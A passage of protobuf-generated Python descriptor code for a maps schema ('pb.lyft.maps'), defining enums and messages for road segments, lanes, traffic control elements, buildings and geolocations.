name='DESIGNATED', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DESIGNATED_BACKWARDS', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DESIGNATED_SHARED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2376,
serialized_end=2502,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS)
_ROADNETWORKSEGMENT_ROADCLASS = _descriptor.EnumDescriptor(
name='RoadClass',
full_name='pb.lyft.maps.RoadNetworkSegment.RoadClass',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_ROAD_CLASS', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MOTORWAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRUNK', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PRIMARY', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SECONDARY', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TERTIARY', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RESIDENTIAL', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNCLASSIFIED', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_PARKING_AISLE', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_DRIVEWAY', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_ALLEY', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_EMERGENCY_ACCESS', index=12, number=12,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_DRIVE_THROUGH', index=13, number=13,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MOTORWAY_LINK', index=14, number=14,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRUNK_LINK', index=15, number=15,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PRIMARY_LINK', index=16, number=16,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SECONDARY_LINK', index=17, number=17,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TERTIARY_LINK', index=18, number=18,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_LIVING_STREET', index=19, number=19,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PEDESTRIAN', index=20, number=20,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PATH', index=21, number=21,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='STEPS', index=22, number=22,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CYCLEWAY', index=23, number=23,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2505,
serialized_end=2950,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_ROADCLASS)
_ROADNETWORKSEGMENT_TRAVELDIRECTION = _descriptor.EnumDescriptor(
name='TravelDirection',
full_name='pb.lyft.maps.RoadNetworkSegment.TravelDirection',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_TRAVEL_DIRECTION', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TWO_WAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_FORWARD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_BACKWARD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_REVERSIBLE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2952,
serialized_end=3079,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_TRAVELDIRECTION)
_ROADNETWORKSEGMENT_SIDEOFSEGMENT = _descriptor.EnumDescriptor(
name='SideOfSegment',
full_name='pb.lyft.maps.RoadNetworkSegment.SideOfSegment',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_SIDE_OF_SEGMENT', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EITHER_SIDE_OF_SEGMENT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SEGMENT_LEFT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SEGMENT_RIGHT', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NEITHER_SIDE_OF_SEGMENT', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=3082,
serialized_end=3220,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_SIDEOFSEGMENT)
_ROADNETWORKSEGMENT_BIKEACCESS = _descriptor.EnumDescriptor(
name='BikeAccess',
full_name='pb.lyft.maps.RoadNetworkSegment.BikeAccess',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NOT_ALLOWED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ALLOWED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DEDICATED', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PROTECTED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=3222,
serialized_end=3319,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_BIKEACCESS)
_LANE_BOUNDARY_DIVIDERTYPE = _descriptor.EnumDescriptor(
name='DividerType',
full_name='pb.lyft.maps.Lane.Boundary.DividerType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NONE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_YELLOW_SOLID', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_WHITE_SOLID', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_YELLOW_DASHED', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_WHITE_DASHED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_SOLID', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_WHITE_SOLID', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_SOLID_FAR_DASHED_NEAR', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_DASHED_FAR_SOLID_NEAR', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB_RED', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB_YELLOW', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB', index=12, number=12,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4482,
serialized_end=4790,
)
_sym_db.RegisterEnumDescriptor(_LANE_BOUNDARY_DIVIDERTYPE)
_LANE_TURNTYPE = _descriptor.EnumDescriptor(
name='TurnType',
full_name='pb.lyft.maps.Lane.TurnType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='THROUGH', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LEFT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARP_LEFT', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RIGHT', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARP_RIGHT', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='U_TURN', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4792,
serialized_end=4894,
)
_sym_db.RegisterEnumDescriptor(_LANE_TURNTYPE)
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE = _descriptor.EnumDescriptor(
name='GeometryType',
full_name='pb.lyft.maps.TrafficControlElement.GeometryType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='POINT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MULTI_POINT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LINESTRING', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='POLYGON', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10237,
serialized_end=10320,
)
_sym_db.RegisterEnumDescriptor(_TRAFFICCONTROLELEMENT_GEOMETRYTYPE)
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION = _descriptor.EnumDescriptor(
name='Orientation',
full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.Orientation',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORWARD', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKWARD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10633,
serialized_end=10686,
)
_sym_db.RegisterEnumDescriptor(_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION)
_SEGMENTSEQUENCE_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.SegmentSequence.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORBIDDEN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MANDATORY', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10688,
serialized_end=10737,
)
_sym_db.RegisterEnumDescriptor(_SEGMENTSEQUENCE_TYPE)
_ANNOTATEDSHAPE_BUILDING_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.AnnotatedShape.Building.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='COMMERCIAL', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RESIDENTIAL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSPORTATION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='HOSPITAL', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EVENT', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PARKING_STRUCTURE', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RELIGIOUS', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EDUCATIONAL', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='GOVERNMENTAL', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11570,
serialized_end=11740,
)
_sym_db.RegisterEnumDescriptor(_ANNOTATEDSHAPE_BUILDING_TYPE)
_GLOBALID = _descriptor.Descriptor(
name='GlobalId',
full_name='pb.lyft.maps.GlobalId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pb.lyft.maps.GlobalId.id', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=99,
serialized_end=121,
)
_GEOLOCATION = _descriptor.Descriptor(
name='GeoLocation',
full_name='pb.lyft.maps.GeoLocation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lat_e7', full_name='pb.lyft.maps.GeoLocation.lat_e7', index=0,
number=1, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lng_e7', full_name='pb.lyft.maps.GeoLocation.lng_e7', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='altitude_cm', full_name='pb.lyft.maps.GeoLocation.altitude_cm', index=2,
number=3, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Altitude', full_name='pb.lyft.maps.GeoLocation.Altitude',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=123,
serialized_end=203,
)
_GEOFRAME = _descriptor.Descriptor(
name='GeoFrame',
full_name='pb.lyft.maps.GeoFrame',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='origin', full_name='pb.lyft.maps.GeoFrame.origin', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bearing_degrees', full_name='pb.lyft.maps.GeoFrame.bearing_degrees', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=205,
serialized_end=283,
)
_LOCALIZEDSTRING = _descriptor.Descriptor(
name='LocalizedString',
full_name='pb.lyft.maps.LocalizedString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='language_code', full_name='pb.lyft.maps.LocalizedString.language_code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='pb.lyft.maps.LocalizedString.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=285,
serialized_end=340,
)
_ROADNETWORKNODE = _descriptor.Descriptor(
name='RoadNetworkNode',
full_name='pb.lyft.maps.RoadNetworkNode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='location', full_name='pb.lyft.maps.RoadNetworkNode.location', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_segments', full_name='pb.lyft.maps.RoadNetworkNode.road_segments', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z_level', full_name='pb.lyft.maps.RoadNetworkNode.z_level', index=2,
number=3, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='junction', full_name='pb.lyft.maps.RoadNetworkNode.junction', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=343,
serialized_end=511,
)
_ACCESSRESTRICTION = _descriptor.Descriptor(
name='AccessRestriction',
full_name='pb.lyft.maps.AccessRestriction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.AccessRestriction.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCESSRESTRICTION_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=514,
serialized_end=684,
)
_DAILYTIMEINTERVAL = _descriptor.Descriptor(
name='DailyTimeInterval',
full_name='pb.lyft.maps.DailyTimeInterval',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='day_of_the_week', full_name='pb.lyft.maps.DailyTimeInterval.day_of_the_week', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='start_local_time_seconds', full_name='pb.lyft.maps.DailyTimeInterval.start_local_time_seconds', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='end_local_time_seconds', full_name='pb.lyft.maps.DailyTimeInterval.end_local_time_seconds', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timezone_database_region_name', full_name='pb.lyft.maps.DailyTimeInterval.timezone_database_region_name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_DAILYTIMEINTERVAL_DAYOFTHEWEEK,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=687,
serialized_end=990,
)
_SCHEDULE = _descriptor.Descriptor(
name='Schedule',
full_name='pb.lyft.maps.Schedule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='daily_schedule', full_name='pb.lyft.maps.Schedule.daily_schedule', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=992,
serialized_end=1059,
)
_CONDITION = _descriptor.Descriptor(
name='Condition',
full_name='pb.lyft.maps.Condition',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='daily_temporal_condition', full_name='pb.lyft.maps.Condition.daily_temporal_condition', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='condition', full_name='pb.lyft.maps.Condition.condition',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=1061,
serialized_end=1154,
)
_ROADNETWORKSEGMENT_LANESET = _descriptor.Descriptor(
name='LaneSet',
full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='num_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_driving_lanes', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_left_turn_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_left_turn_driving_lanes', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_right_turn_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_right_turn_driving_lanes', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turn_descriptions_for_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.turn_descriptions_for_driving_lanes', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bike_lane_access', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.bike_lane_access', index=4,
number=16, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2135,
serialized_end=2502,
)
_ROADNETWORKSEGMENT = _descriptor.Descriptor(
name='RoadNetworkSegment',
full_name='pb.lyft.maps.RoadNetworkSegment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='vertices', full_name='pb.lyft.maps.RoadNetworkSegment.vertices', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='start_node', full_name='pb.lyft.maps.RoadNetworkSegment.start_node', index=1,
